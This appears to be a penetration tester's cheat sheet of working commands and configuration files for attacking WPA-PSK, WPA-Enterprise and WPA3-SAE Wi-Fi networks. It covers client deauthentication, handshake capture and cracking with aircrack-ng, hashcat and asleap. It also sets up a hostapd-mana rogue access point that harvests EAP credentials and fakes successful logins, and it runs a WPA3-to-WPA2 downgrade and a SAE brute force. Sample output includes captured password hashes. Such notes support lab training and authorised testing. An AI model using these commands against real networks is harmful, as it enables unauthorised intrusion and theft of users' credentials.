Attacking WPA

WPA/PSK

# Death clients and crack the handshake 
sudo airodump-ng –bssid F0:9F:C2:71:22:12 -c 6 -w wpa wlan0mon
sudo aireplay-ng –deauth 0 -a F0:9F:C2:71:22:12 wlan0mon
sudo aircrack-ng wpa.pcap -w rockyou.txt

WPA

MGT = WPA Enterprise
# Airodump-ng command and output on channel 3, focused on a BSSID to capture 4-way handshake
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon
# Deauthenticating associated client to get the certificate
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 wlan0mon
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# We can add display filters to show the exact frames where the certificate is given (first server, second ca)
# For each certificate, we right click and select Export Packet Bytes to save the data into a file with a .der extension
tls.handshake.type == 11
tls.handshake.certificate
wlan.bssid==E8:9F:80:03:63:4A && eap && tls.handshake.certificate
# Display information about the certificat using openssl (note Subject value)
openssl x509 -inform der -in CERTIFICATE_FILENAME -text
#  We can convert the certificat to PEM format (Optional)
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt

# Configuring freeradius & Certificate generation
sudo apt install freeradius
cd /etc/freeradius/3.0/certs
nano ca.cnf
        [certificate_authority]
        countryName             = US
        stateOrProvinceName     = CA
        localityName            = San Francisco
        organizationName        = Playtronics
        emailAddress            = ca@playtronics.com
        commonName              = "Playtronics Certificate Authority"
nano server.cnf
        [server]
        countryName             = US
        stateOrProvinceName     = CA
        localityName            = San Francisco
        organizationName        = Playtronics
        emailAddress            = admin@playtronics.com
        commonName              = "Playtronics"
rm dh
make destroycerts
make

# We need to change mana.conf conf file and creat mana.eap_user file. creds will be stored in /tmp/hostapd.credout
sudo hostapd-mana /etc/hostapd-mana/mana.conf
    wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
    MANA EAP Identity Phase 1: cosmo
    MANA EAP EAP-MSCHAPV2 ASLEAP user=cosmo | asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4
    MANA EAP EAP-MSCHAPV2 JTR | cosmo:$NETNTLM$ceb69885c656590c$7279f65aa49870f45822c89dcbdd73c1b89d377844caead4:::::::
    MANA EAP EAP-MSCHAPV2 HASHCAT | cosmo::::7279f65aa49870f45822c89dcbdd73c1b89d377844caead4:ceb69885c656590c
# Running asleap on hostAPd credentials to crack the password
asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst

mana.conf & mana.eap_user

/etc/hostapd-mana/mana.conf

# SSID of the AP
ssid=<ssid>

# Network interface to use and driver type
# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'
interface=wlan0
driver=nl80211

# Channel and mode
# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)
channel=<channel>
# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax. hw_mode=a for 5GHz and channel 44
hw_mode=g

# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1

# Key workaround for Win XP
eapol_key_index_workaround=0

# EAP user file we created earlier
eap_user_file=/etc/hostapd-mana/mana.eap_user

# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
# The password is actually 'whatever'
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh

# Open authentication
auth_algs=1
# WPA/WPA2
wpa=3
# WPA Enterprise
wpa_key_mgmt=WPA-EAP
# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP

# Enable Mana WPE
mana_wpe=1

# Store credentials in that file
mana_credout=/tmp/hostapd.credout

# Send EAP success, so the client thinks it's connected
mana_eapsuccess=1

# EAP TLS MitM
mana_eaptls=1

/etc/hostapd-mana/mana.eap_user

*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]

WPA3-SAE

# if no client connected => Brute force the password
./wacker.py --wordlist ~/rockyou.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462

# IF client connected try => downgrade the client forcing it to connect to our RogueAP with WPA2
hostapd-mana hostapd-sae.conf
# deauth clients from the real AP
iwconfig wlan0mon channel 11
aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25  -c 10:F9:6F:AC:53:52
# crack 
hashcat -a 0 -m 2500 hostapd-management.hccapx rockyou.txt --force
hashcat -m 2500 --deprecated-check-disable hash rockyou.txt

hostapd-sae.conf

interface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=wifi-IT
mana_wpaout=hostapd-management.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678